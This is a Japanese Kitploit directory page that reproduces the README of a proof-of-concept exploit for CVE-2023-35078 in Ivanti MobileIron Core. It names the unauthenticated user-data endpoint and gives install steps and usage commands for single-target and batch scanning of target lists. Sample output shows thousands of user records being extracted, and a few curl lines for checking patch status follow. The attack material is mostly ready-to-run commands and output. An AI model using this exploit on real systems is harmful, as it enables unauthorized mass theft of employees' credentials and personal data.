Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-35078 — CVE-2023-35078 - Ivanti MobileIron Core のリモート未認証APIアクセスエクスプロイトツール | Kitploit
ツール/GitHubGitHub/0nsec/cve-2023-35078
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Ivanti MobileIron Core のリモート未認証APIアクセスエクスプロイトツール

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-35078 エクスプロイトツール

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core Remote Unauthenticated API Access

Python Version License CVSS Last Updated

Ivanti MobileIron Core システムのリモート未認証 API アクセス脆弱性を標的とした、CVE-2023-35078 用の Python ベースの概念実証(PoC)エクスプロイトです。

脆弱性の概要

CVE-2023-35078 は Ivanti MobileIron Core に影響を及ぼす重大な脆弱性で、リモートの未認証攻撃者が認証なしで機密性の高い API エンドポイントにアクセスし、ユーザーデータを抽出することを可能にします。

  • CVSS スコア: 9.8(重大)
  • CWE: CWE-306(重要な機能に対する認証の欠如)
  • 影響を受ける製品: Ivanti MobileIron Core
  • 脆弱なバージョン:
    • 11.2(11.2 CU21 より前)
    • 11.3(11.3 CU18 より前)
    • 11.4(11.4 CU8 より前)
  • 攻撃元: ネットワーク
  • 認証: 不要
  • ユーザー操作: 不要
  • 影響: ユーザーデータの完全な露出

技術的詳細

この脆弱性は MobileIron Core の API 認証メカニズム、具体的には /mifs/aad/api/v2/authorized/users エンドポイントに存在します。このエンドポイントは認証トークンを適切に検証しないため、以下を含む機密性の高いユーザー情報への不正アクセスを許します:

  • ユーザー資格情報: ユーザー名、パスワードハッシュ
  • 個人データ: 氏名、メールアドレス、電話番号
  • 企業データ: 従業員 ID、部署情報
  • デバイス情報: 登録済みデバイス、デバイス設定
  • 管理データ: ユーザーロール、権限、グループメンバーシップ

インストール

前提条件

  • Python: 3.6 以上
  • オペレーティングシステム: Linux、macOS、Windows
  • ネットワークアクセス: ターゲットのテストに必要
  • 権限: システム所有者からの承認

クイックインストール

root@kitploit:~
# Clone the repository
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# Install dependencies
pip3 install -r requirements.txt

# Make executable (Linux/macOS)
chmod +x cve_2023_35078.py

手動インストール

root@kitploit:~
# Create project directory
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# Download the script
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# Install required packages
pip3 install requests urllib3 termcolor argparse

Docker インストール(オプション)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Build and run with Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

使用方法

基本的な使用方法

root@kitploit:~
# Test single target
python3 cve_2023_35078.py -u https://mobileiron.example.com

# Test multiple targets from file
python3 cve_2023_35078.py -f targets.txt

# Verbose mode with custom output directory
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# Custom timeout and output settings
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

高度な使用例

root@kitploit:~
# Comprehensive corporate assessment
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# Single target with detailed logging
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# Batch scanning with custom timeout
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# Quick vulnerability check (no verbose output)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

出力

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Target: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Checking version for: https://vulnerable.mobileiron.com
[*] Detected version: 11.3
[+] Target appears VULNERABLE!
[*] Attempting to exploit: https://vulnerable.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] SUCCESS! Found 1,247 users
[+] Results saved to: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Extracted 1247 user records
[*] Sample fields: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] Scan completed!
[*] Targets processed: 1
[*] Successful exploits: 1
[!] WARNING: 1 vulnerable system(s) found!
[!] Ensure proper authorization before testing!

詳細出力

root@kitploit:~
[*] Checking version for: https://test.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Response length: 45,123 bytes
[*] JSON parsing successful
[*] Found user data structure with 234 records
[+] SUCCESS! Found 234 users
[*] Sample user data: {'id': '12345', 'username': '[email protected]'}
[+] Results saved to: ./results/test_mobileiron_com_20250821_055013.json

パフォーマンス最適化

  • 接続プーリング: HTTP 接続の再利用
  • 並行リクエスト: 複数ターゲットの並列処理
  • スマートタイムアウト: 応答時間に基づく適応的タイムアウト
  • メモリ管理: 大規模データセットの効率的な処理
  • レート制限: ターゲットへの過負荷を回避する組み込みの遅延

ベンダーパッチ情報

パッチ確認

root@kitploit:~
# Check current version
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# Verify patched endpoints return 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

参考情報とリソース

公式セキュリティアドバイザリ

  • NVD - CVE-2023-35078
  • Ivanti セキュリティアドバイザリ
  • CISA 既知の悪用された脆弱性カタログ

技術ドキュメント

  • Ivanti MobileIron Core 管理者ガイド
  • API ドキュメント
  • セキュリティ堅牢化ガイド

調査レポートと分析

  • 詳細な技術分析
  • エクスプロイト手法
  • 脅威インテリジェンスレポート
ツールをダウンロード
バージョン脆弱性パッチ提供パッチレベルリリース日
11.2.xありありCU21+2023-07-25
11.3.xありありCU18+2023-07-25
11.4.xありありCU8+2023-07-25
11.5.x+なしN/AN/AN/A